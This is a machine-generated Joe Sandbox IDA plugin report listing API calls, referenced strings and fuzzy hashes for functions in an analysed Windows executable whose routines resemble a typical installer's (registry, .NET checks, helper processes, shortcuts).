                                                                              • Opcode ID: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                              • Instruction ID: db08b3a78c5346aa08fc53deac37c7c900aaeab2e7ee66e1d047288e3336f214
                                                                              • Opcode Fuzzy Hash: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                              • Instruction Fuzzy Hash: 55D11374A00149AFDB11EFA9D882BDDB7F5AF48304F50806AF804B7391D778AE45CB69
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,?,00000000,?,00000000,00454029,?,0045A28A,00000003,00000000,00000000,00454060), ref: 00453EA9
                                                                                • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                              • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F2D
                                                                              • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F5C
                                                                              Strings
                                                                              • , xrefs: 00453E1A
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DC7
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E00
                                                                              • RegOpenKeyEx, xrefs: 00453E2C
                                                                              Similarity
                                                                              • API ID: QueryValue$FormatMessageOpen
                                                                              • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                              • API String ID: 2812809588-1577016196
                                                                              • Opcode ID: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                              • Instruction ID: 0c0f272a557b88975729148cb7875cb844f630b1a696a545db65abb6b51d3efb
                                                                              • Opcode Fuzzy Hash: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                              • Instruction Fuzzy Hash: 9D912271E04208ABDB11DF95D942BDEB7F8EB48745F10406BF901FB282D6789E09CB69
                                                                              APIs
                                                                                • Part of subcall function 00458A84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C1F
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C89
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458CF0
                                                                              Strings
                                                                              • .NET Framework version %s not found, xrefs: 00458D29
                                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458BD2
                                                                              • v1.1.4322, xrefs: 00458CE2
                                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458CA3
                                                                              • v4.0.30319, xrefs: 00458C11
                                                                              • v2.0.50727, xrefs: 00458C7B
                                                                              • .NET Framework not found, xrefs: 00458D3D
                                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458C3C
                                                                              Similarity
                                                                              • API ID: Close$Open
                                                                              • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                              • API String ID: 2976201327-446240816
                                                                              • Opcode ID: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                              • Instruction ID: 32352305a0336a12336774107b7ff5a8d04594bb7e4f1119dbb0a5d8803071dd
                                                                              • Opcode Fuzzy Hash: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                              • Instruction Fuzzy Hash: 7351D430A041485BCB00DB65C861BEE77B6DB99305F14447FE941EB393DF399A0E8B69
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(?), ref: 0045819B
                                                                              • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004581B7
                                                                              • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004581C5
                                                                              • GetExitCodeProcess.KERNEL32(?), ref: 004581D6
                                                                              • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045821D
                                                                              • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458239
                                                                              Strings
                                                                              • Helper process exited with failure code: 0x%x, xrefs: 00458203
                                                                              • Helper process exited., xrefs: 004581E5
                                                                              • Stopping 64-bit helper process. (PID: %u), xrefs: 0045818D
                                                                              • Helper isn't responding; killing it., xrefs: 004581A7
                                                                              • Helper process exited, but failed to get exit code., xrefs: 0045820F
                                                                              Similarity
                                                                              • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                              • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                              • API String ID: 3355656108-1243109208
                                                                              • Opcode ID: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                              • Instruction ID: ca0659a1f7dd3987533feb970b51f52a81168d3092bf9212e29b303cc353bad7
                                                                              • Opcode Fuzzy Hash: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                              • Instruction Fuzzy Hash: 79217170604B409AD720E7B9C44574B7AD49F49305F048C6FF99AEB293DE78E8488B2A
                                                                              APIs
                                                                                • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453B6B
                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453CA7
                                                                                • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A83
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AB3
                                                                              • , xrefs: 00453ACD
                                                                              • RegCreateKeyEx, xrefs: 00453ADF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateFormatMessageQueryValue
                                                                              • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                              • API String ID: 2481121983-1280779767
                                                                              • Opcode ID: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                              • Instruction ID: 9af730bdb9cddd4578bad4c79146292dd217fd331dbe672fdf24ed7127d9b52a
                                                                              • Opcode Fuzzy Hash: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                              • Instruction Fuzzy Hash: 89811076A00209AFDB01DFD5C941BDEB7B9EF48345F50442AF900F7282D778AE498B69
                                                                              APIs
                                                                                • Part of subcall function 00452F1C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                                • Part of subcall function 00452F1C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00495129
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049527D), ref: 0049514A
                                                                              • CreateWindowExA.USER32(00000000,STATIC,0049528C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495171
                                                                              • SetWindowLongA.USER32(?,000000FC,00494904), ref: 00495184
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC,0049528C), ref: 004951B4
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00495228
                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000), ref: 00495234
                                                                                • Part of subcall function 0045326C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                              • 73A25CF0.USER32(?,00495257,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC), ref: 0049524A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                              • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                              • API String ID: 170458502-2312673372
                                                                              • Opcode ID: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                              • Instruction ID: 9b82285d6c0ab0379da714a391ea46bab388e10fbcdfaad342ba26a277b4da99
                                                                              • Opcode Fuzzy Hash: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                              • Instruction Fuzzy Hash: 8D416670A40608AFDF01EBA5DC52F9E7BF8EB09704F6045B6F500F7291D7799A008BA8
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E369
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E3BD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCloseHandleModuleProc
                                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$mVE
                                                                              • API String ID: 4190037839-37397897
                                                                              • Opcode ID: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                              • Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
                                                                              • Opcode Fuzzy Hash: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                              • Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59
                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 00462124
                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462138
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462145
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462152
                                                                              • GetWindowRect.USER32(?,00000000), ref: 0046219E
                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004621DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                              • API String ID: 2610873146-3407710046
                                                                              • Opcode ID: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                              • Instruction ID: fd6996cff919b5887080f465a26ac3447cdf71e0405d1b359808dab19ab714f4
                                                                              • Opcode Fuzzy Hash: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                              • Instruction Fuzzy Hash: A7210771704B006BD300D664CD41F7B36D4EB85710F08052AFA84EB382EAB8DD018A9A
                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 0042F008
                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
                                                                              • GetWindowRect.USER32(?,00000000), ref: 0042F082
                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                              • API String ID: 2610873146-3407710046
                                                                              • Opcode ID: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                              • Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
                                                                              • Opcode Fuzzy Hash: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                              • Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AC2
                                                                              • CoCreateInstance.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AE8
                                                                              • SysFreeString.OLEAUT32(?), ref: 00455C47
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstance$FreeString
                                                                              • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
                                                                              • API String ID: 308859552-2052886881
                                                                              • Opcode ID: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                              • Instruction ID: 75ae484d58e3d3074f9f089aff153db97feeda1b73ba6cb4122c168b6c8c5e36
                                                                              • Opcode Fuzzy Hash: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                              • Instruction Fuzzy Hash: 76915171A00604AFDB40DFA9C895BAE77F8AF09305F14446AF904EB262DB78DD08CB59
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045851B,?,00000000,0045857E,?,?,02113858,00000000), ref: 00458399
                                                                              • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 004583F6
                                                                              • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 00458403
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045844F
                                                                              • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,004584B0,?,00000000), ref: 00458475
                                                                              • GetLastError.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,004584B0,?,00000000), ref: 0045847C
                                                                                • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                              • String ID: CreateEvent$TransactNamedPipe
                                                                              • API String ID: 2182916169-3012584893
                                                                              • Opcode ID: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                              • Instruction ID: 22acba0fcf61382a58efe17371b9c4a56388ad6b02d4dd4833f4e79bb834958c
                                                                              • Opcode Fuzzy Hash: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                              • Instruction Fuzzy Hash: 8641A475A00608AFDB15DF95CD81F9EB7F8FB49714F1040AAF904F7292DA789E44CA28
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045607D,?,?,00000031,?), ref: 00455F40
• GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455F46
• LoadTypeLib.OLEAUT32(00000000,?), ref: 00455F93
  • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: AddressErrorHandleLastLoadModuleProcType
• String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
• API String ID: 1914119943-2711329623
• Opcode ID: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
• Instruction ID: 464ca0410b994955771bbd6b79a2bac712fdb799e88c0b9d306e26cdd2de6b74
• Opcode Fuzzy Hash: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
• Instruction Fuzzy Hash: 2231C471B00604AFCB10EFAACD51E5BB7BEEB89B11B518466FC04D3292DA78DD05C768
APIs
• RectVisible.GDI32(?,?), ref: 00416E23
• SaveDC.GDI32(?), ref: 00416E37
• IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
• RestoreDC.GDI32(?,?), ref: 00416E75
• CreateSolidBrush.GDI32(00000000), ref: 00416EF5
• FrameRect.USER32(?,?,?), ref: 00416F28
• DeleteObject.GDI32(?), ref: 00416F32
• CreateSolidBrush.GDI32(00000000), ref: 00416F42
• FrameRect.USER32(?,?,?), ref: 00416F75
• DeleteObject.GDI32(?), ref: 00416F7F
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
• String ID:
• API String ID: 375863564-0
• Opcode ID: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
• Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
• Opcode Fuzzy Hash: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
• Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
• GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
• GetFileType.KERNEL32(?,000000F5), ref: 00404C11
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
• GetLastError.KERNEL32(000000F5), ref: 00404C46
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
• Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
• Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
• Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
• Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
APIs
• GetSystemMenu.USER32(00000000,00000000), ref: 00422243
• DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
• DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
• DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
• DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
